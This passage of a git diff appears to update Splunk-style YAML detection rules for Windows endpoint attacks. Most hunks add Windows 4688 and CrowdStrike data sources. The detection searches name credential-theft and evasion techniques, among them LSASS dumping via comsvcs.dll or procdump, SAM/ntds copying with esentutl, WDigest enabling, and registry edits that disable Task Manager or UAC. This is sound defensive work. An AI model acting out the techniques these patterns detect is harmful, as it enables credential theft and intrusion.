 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions"
diff --git a/detections/endpoint/disabling_net_user_account.yml b/detections/endpoint/disabling_net_user_account.yml
index cdf0c53c18..fcc5590493 100644
--- a/detections/endpoint/disabling_net_user_account.yml
+++ b/detections/endpoint/disabling_net_user_account.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the `net.exe` utility to
   attacker in maintaining control or covering their tracks.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.process_id)
   as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/disabling_norun_windows_app.yml b/detections/endpoint/disabling_norun_windows_app.yml
index 921201e39f..2654bf65a0 100644
--- a/detections/endpoint/disabling_norun_windows_app.yml
+++ b/detections/endpoint/disabling_norun_windows_app.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of the Windows regi
   malicious, this action could hinder system cleaning efforts and make it more difficult
   to run essential tools, thereby aiding malware persistence.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun"
diff --git a/detections/endpoint/disabling_remote_user_account_control.yml b/detections/endpoint/disabling_remote_user_account_control.yml
index 0e7ef58cfc..f6ea7faffd 100644
--- a/detections/endpoint/disabling_remote_user_account_control.yml
+++ b/detections/endpoint/disabling_remote_user_account_control.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the registry key
   elevated privileges, making it easier to execute further attacks or maintain persistence
   within the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA*
diff --git a/detections/endpoint/disabling_systemrestore_in_registry.yml b/detections/endpoint/disabling_systemrestore_in_registry.yml
index 432a5d661b..a3cc1f29a0 100644
--- a/detections/endpoint/disabling_systemrestore_in_registry.yml
+++ b/detections/endpoint/disabling_systemrestore_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of registry keys to
   system recovery, allowing the attacker to sustain their foothold and potentially
   cause further damage or data loss.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
diff --git a/detections/endpoint/disabling_task_manager.yml b/detections/endpoint/disabling_task_manager.yml
index a6493c253f..382f4a93e3 100644
--- a/detections/endpoint/disabling_task_manager.yml
+++ b/detections/endpoint/disabling_task_manager.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the Windows regi
   users from terminating malicious processes. If confirmed malicious, this could allow
   attackers to maintain persistence and control over the infected system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr"
diff --git a/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml b/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
index acf711fc4a..0903cfcc9d 100644
--- a/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
+++ b/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
@@ -6,7 +6,7 @@ author: Dean Luxton
 status: production
 type: TTP
 data_source:
-- Sysmon Event ID 13
+- Sysmon EventID 13 AND Sysmon EventID 1
 description: The following analytic identifies the deletion of registry keys that
   disable Local Security Authority (LSA) protection and Microsoft Defender Device
   Guard. It leverages data from Endpoint Detection and Response (EDR) agents, focusing
diff --git a/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml b/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
index 6b96a1dd98..1788a42946 100644
--- a/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects instances of DLLHost.exe running wit
   to execute code, move laterally, or exfiltrate data, posing a severe threat to the
   network's security.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=dllhost.exe
   Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name
diff --git a/detections/endpoint/dns_exfiltration_using_nslookup_app.yml b/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
index 8fa692ce80..ce76b2bb3e 100644
--- a/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
+++ b/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies potential DNS exfiltration using
   to critical information.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process
   count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/domain_account_discovery_with_dsquery.yml b/detections/endpoint/domain_account_discovery_with_dsquery.yml
index 77893e8ccf..9568e08f11 100644
--- a/detections/endpoint/domain_account_discovery_with_dsquery.yml
+++ b/detections/endpoint/domain_account_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `dsquery.exe` wi
   lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="dsquery.exe"
   AND Processes.process = "*user*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_account_discovery_with_net_app.yml b/detections/endpoint/domain_account_discovery_with_net_app.yml
index 3fa0097ee5..afcc6c7711 100644
--- a/detections/endpoint/domain_account_discovery_with_net_app.yml
+++ b/detections/endpoint/domain_account_discovery_with_net_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
   potentially leading to further exploitation or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process
   = "* user*" AND Processes.process = "*/do*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_account_discovery_with_wmic.yml b/detections/endpoint/domain_account_discovery_with_wmic.yml
index 971cb6bfe4..0bc293890b 100644
--- a/detections/endpoint/domain_account_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_account_discovery_with_wmic.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
   facilitating further attacks and potentially compromising sensitive information.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="wmic.exe"
   AND Processes.process = "*/NAMESPACE:\\\\root\\directory\\ldap*" AND Processes.process
diff --git a/detections/endpoint/domain_controller_discovery_with_nltest.yml b/detections/endpoint/domain_controller_discovery_with_nltest.yml
index d93ad4be9e..6a1dd7d0e5 100644
--- a/detections/endpoint/domain_controller_discovery_with_nltest.yml
+++ b/detections/endpoint/domain_controller_discovery_with_nltest.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `nltest.exe` with c
   further attacks such as privilege escalation or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="nltest.exe")
   (Processes.process="*/dclist:*" OR Processes.process="*/dsgetdc:*") by Processes.dest
diff --git a/detections/endpoint/domain_controller_discovery_with_wmic.yml b/detections/endpoint/domain_controller_discovery_with_wmic.yml
index 9fad87c1ad..eb4c6682fc 100644
--- a/detections/endpoint/domain_controller_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_controller_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `wmic.exe` with
   to unauthorized access and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
   (Processes.process="" OR Processes.process="*DomainControllerAddress*") by Processes.dest
diff --git a/detections/endpoint/domain_group_discovery_with_dsquery.yml b/detections/endpoint/domain_group_discovery_with_dsquery.yml
index f30afa419a..eb8f5e3edc 100644
--- a/detections/endpoint/domain_group_discovery_with_dsquery.yml
+++ b/detections/endpoint/domain_group_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `dsquery.exe` wi
   attacks, potentially leading to privilege escalation or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe")
   (Processes.process="*group*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_group_discovery_with_net.yml b/detections/endpoint/domain_group_discovery_with_net.yml
index 4707b6fecc..640a60b233 100644
--- a/detections/endpoint/domain_group_discovery_with_net.yml
+++ b/detections/endpoint/domain_group_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` with c
   such as privilege escalation or lateral movement.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
   OR Processes.process_name="net1.exe") (Processes.process=*group* AND Processes.process=*/do*)
diff --git a/detections/endpoint/domain_group_discovery_with_wmic.yml b/detections/endpoint/domain_group_discovery_with_wmic.yml
index 5ee7680ba9..4878ea0088 100644
--- a/detections/endpoint/domain_group_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_group_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `wmic.exe` with
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
   (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_group*
diff --git a/detections/endpoint/drop_icedid_license_dat.yml b/detections/endpoint/drop_icedid_license_dat.yml
index 67eed26a0a..8414b775e6 100644
--- a/detections/endpoint/drop_icedid_license_dat.yml
+++ b/detections/endpoint/drop_icedid_license_dat.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the dropping of a suspicious file na
   confirmed malicious, the attacker could gain unauthorized access to financial data,
   leading to significant financial loss and data breaches.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 11
 search: '`sysmon` EventCode= 11  TargetFilename = "*\\license.dat" AND (TargetFilename="*\\appdata\\*"
   OR TargetFilename="*\\programdata\\*") |stats count min(_time) as firstTime max(_time)
   as lastTime by TargetFilename EventCode process_id  process_name dest | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/dsquery_domain_discovery.yml b/detections/endpoint/dsquery_domain_discovery.yml
index 89ab1635e5..c93cf5eeaf 100644
--- a/detections/endpoint/dsquery_domain_discovery.yml
+++ b/detections/endpoint/dsquery_domain_discovery.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of "dsquery.exe" with
   access to trusted domains.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe
   Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/dump_lsass_via_comsvcs_dll.yml b/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
index 99767ac7bb..f74ff6c01a 100644
--- a/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
+++ b/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the behavior of dumping credentials from memory by exploiting the Local Security Authority Subsystem Service (LSASS) using the comsvcs.dll and MiniDump via rundll32. This detection leverages process information from Endpoint Detection and Response (EDR) logs, focusing on specific command-line executions. This activity is significant because it indicates potential credential theft, which can lead to broader system compromise, persistence, lateral movement, and privilege escalation. If confirmed malicious, attackers could gain unauthorized access to sensitive information, leading to data theft, ransomware attacks, or other damaging outcomes.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll*
   Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/dump_lsass_via_procdump.yml b/detections/endpoint/dump_lsass_via_procdump.yml
index f01ad02d9d..c43a1f303b 100644
--- a/detections/endpoint/dump_lsass_via_procdump.yml
+++ b/detections/endpoint/dump_lsass_via_procdump.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of procdump.exe to dump the
   compromise of the environment.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma*
   OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/elevated_group_discovery_with_net.yml b/detections/endpoint/elevated_group_discovery_with_net.yml
index 87c932dc05..f667778adf 100644
--- a/detections/endpoint/elevated_group_discovery_with_net.yml
+++ b/detections/endpoint/elevated_group_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
   access to sensitive systems and data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
   OR Processes.process_name="net1.exe") (Processes.process="*group*" AND Processes.process="*/do*")
diff --git a/detections/endpoint/elevated_group_discovery_with_wmic.yml b/detections/endpoint/elevated_group_discovery_with_wmic.yml
index a55c1d2588..c13ce10927 100644
--- a/detections/endpoint/elevated_group_discovery_with_wmic.yml
+++ b/detections/endpoint/elevated_group_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
   access and control over critical network resources.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
   (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap*) (Processes.process="*Domain
diff --git a/detections/endpoint/enable_rdp_in_other_port_number.yml b/detections/endpoint/enable_rdp_in_other_port_number.yml
index ba5dc70525..29c3736edc 100644
--- a/detections/endpoint/enable_rdp_in_other_port_number.yml
+++ b/detections/endpoint/enable_rdp_in_other_port_number.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that e
   to bypass network defenses, gain persistent access, and potentially control the
   compromised machine.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal
diff --git a/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml b/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
index 0243c5f583..d32c39f50f 100644
--- a/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
+++ b/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
   If confirmed malicious, this could allow an attacker to obtain sensitive credentials,
   leading to further compromise and lateral movement within the network.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\*"
diff --git a/detections/endpoint/esentutl_sam_copy.yml b/detections/endpoint/esentutl_sam_copy.yml
index 4153e98ff3..484a90ff0c 100644
--- a/detections/endpoint/esentutl_sam_copy.yml
+++ b/detections/endpoint/esentutl_sam_copy.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `esentutl.exe` to access
   network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_esentutl` Processes.process
   IN ("*ntds*", "*SAM*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/etw_registry_disabled.yml b/detections/endpoint/etw_registry_disabled.yml
index 39c9f4b5be..1dd5816a6e 100644
--- a/detections/endpoint/etw_registry_disabled.yml
+++ b/detections/endpoint/etw_registry_disabled.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a registry modification that disable
   undetected, potentially leading to further compromise and persistent access within
   the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\SOFTWARE\\Microsoft\\.NETFramework*" Registry.registry_value_name
diff --git a/detections/endpoint/eventvwr_uac_bypass.yml b/detections/endpoint/eventvwr_uac_bypass.yml
index 76f5b40457..1fa34580aa 100644
--- a/detections/endpoint/eventvwr_uac_bypass.yml
+++ b/detections/endpoint/eventvwr_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an Eventvwr UAC bypass by identifyin
   compromise of the affected system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
   AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
   Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/excel_spawning_powershell.yml b/detections/endpoint/excel_spawning_powershell.yml
index a0b87e1141..a3e559a028 100644
--- a/detections/endpoint/excel_spawning_powershell.yml
+++ b/detections/endpoint/excel_spawning_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects Microsoft Excel spawning PowerShell,
   privilege escalation, or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.parent_process_name="excel.exe" `process_powershell` by Processes.parent_process
diff --git a/detections/endpoint/excel_spawning_windows_script_host.yml b/detections/endpoint/excel_spawning_windows_script_host.yml
index b0a85217a8..0dbb970645 100644
--- a/detections/endpoint/excel_spawning_windows_script_host.yml
+++ b/detections/endpoint/excel_spawning_windows_script_host.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Excel s
   Immediate investigation and mitigation are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.parent_process_name="excel.exe" Processes.process_name IN ("cscript.exe",
diff --git a/detections/endpoint/excessive_attempt_to_disable_services.yml b/detections/endpoint/excessive_attempt_to_disable_services.yml
index f3330cfa40..289c6878be 100644
--- a/detections/endpoint/excessive_attempt_to_disable_services.yml
+++ b/detections/endpoint/excessive_attempt_to_disable_services.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious series of command-li
   security mechanisms, thereby increasing the risk of further exploitation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where   Processes.process_name =
diff --git a/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml b/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
index 317b1d34b7..0988a0f3b1 100644
--- a/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
+++ b/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies an excessive number of distinct p
   posing a severe threat to system integrity and security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   distinct_count(Processes.process) as distinct_process_count  min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path
diff --git a/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml b/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
index 14c3da5d5b..482a141d0d 100644
--- a/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
+++ b/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
@@ -12,7 +12,7 @@ description: The following analytic detects excessive file deletion events in th
   If confirmed malicious, this activity could allow an attacker to disable endpoint
   protection, facilitating further malicious actions without detection.
 data_source:
-- Sysmon EventID 23
+- Sysmon EventID 23 
 - Sysmon EventID 26
 search: '`sysmon` EventCode IN ("23","26") TargetFilename = "*\\ProgramData\\Microsoft\\Windows
   Defender\\*" | stats count, values(TargetFilename) as deleted_files, min(_time)
diff --git a/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml b/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
index 08d62164b5..84c8c83e3d 100644
--- a/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
+++ b/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an excessive number of `sc.exe` proc
   the compromised system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` distinct_count(Processes.process)
   as distinct_cmdlines values(Processes.process_id) as process_ids min(_time) as firstTime
   max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name
diff --git a/detections/endpoint/excessive_number_of_taskhost_processes.yml b/detections/endpoint/excessive_number_of_taskhost_processes.yml
index f8a3260d94..673e2ab90b 100644
--- a/detections/endpoint/excessive_number_of_taskhost_processes.yml
+++ b/detections/endpoint/excessive_number_of_taskhost_processes.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies an excessive number of taskhost.e
   privileges, or move laterally within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process_id) as
   process_ids  min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
   WHERE Processes.process_name = "taskhost.exe" OR Processes.process_name = "taskhostex.exe"
diff --git a/detections/endpoint/excessive_service_stop_attempt.yml b/detections/endpoint/excessive_service_stop_attempt.yml
index 1319bf5119..d9f2ccc4cb 100644
--- a/detections/endpoint/excessive_service_stop_attempt.yml
+++ b/detections/endpoint/excessive_service_stop_attempt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects multiple attempts to stop or delete
   the system's security posture.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where `process_net` OR  Processes.process_name
diff --git a/detections/endpoint/excessive_usage_of_cacls_app.yml b/detections/endpoint/excessive_usage_of_cacls_app.yml
index 343c5eb6a4..c25a3d7d46 100644
--- a/detections/endpoint/excessive_usage_of_cacls_app.yml
+++ b/detections/endpoint/excessive_usage_of_cacls_app.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies excessive usage of `cacls.exe`, `
   critical files, aiding in the persistence and concealment of malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id  values(Processes.process_name) as process_name
   count min(_time) as firstTime max(_time) as lastTime  from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/excessive_usage_of_net_app.yml b/detections/endpoint/excessive_usage_of_net_app.yml
index b9557e2e91..3fd324c5c1 100644
--- a/detections/endpoint/excessive_usage_of_net_app.yml
+++ b/detections/endpoint/excessive_usage_of_net_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of `net.exe` or `net
   malicious actions.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where `process_net` by Processes.process_name
diff --git a/detections/endpoint/excessive_usage_of_nslookup_app.yml b/detections/endpoint/excessive_usage_of_nslookup_app.yml
index 9d61ab590e..85204a4ab8 100644
--- a/detections/endpoint/excessive_usage_of_nslookup_app.yml
+++ b/detections/endpoint/excessive_usage_of_nslookup_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the nslookup appl
   out of the network, bypassing traditional data exfiltration defenses.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`sysmon` EventCode = 1 process_name = "nslookup.exe" | bucket _time span=1m
   | stats count as numNsLookup by dest, _time | eventstats avg(numNsLookup) as avgNsLookup,
   stdev(numNsLookup) as stdNsLookup, count as numSlots by dest | eval upperThreshold=(avgNsLookup
diff --git a/detections/endpoint/excessive_usage_of_sc_service_utility.yml b/detections/endpoint/excessive_usage_of_sc_service_utility.yml
index 074a2c9698..41194d4c27 100644
--- a/detections/endpoint/excessive_usage_of_sc_service_utility.yml
+++ b/detections/endpoint/excessive_usage_of_sc_service_utility.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the `sc.exe` serv
   leading to system compromise or disruption of security defenses.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`sysmon` EventCode = 1 process_name = "sc.exe" |  bucket _time span=15m |
   stats values(process) as process count as numScExe by dest, _time |  eventstats
   avg(numScExe) as avgScExe, stdev(numScExe) as stdScExe, count as numSlots by dest
diff --git a/detections/endpoint/excessive_usage_of_taskkill.yml b/detections/endpoint/excessive_usage_of_taskkill.yml
index 3ba32c264a..448d2a796a 100644
--- a/detections/endpoint/excessive_usage_of_taskkill.yml
+++ b/detections/endpoint/excessive_usage_of_taskkill.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies excessive usage of `taskkill.exe`
   the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe"  by
diff --git a/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml b/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
index 05722b76c7..2d4425be5e 100644
--- a/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
+++ b/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of JavaScript using th
   the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
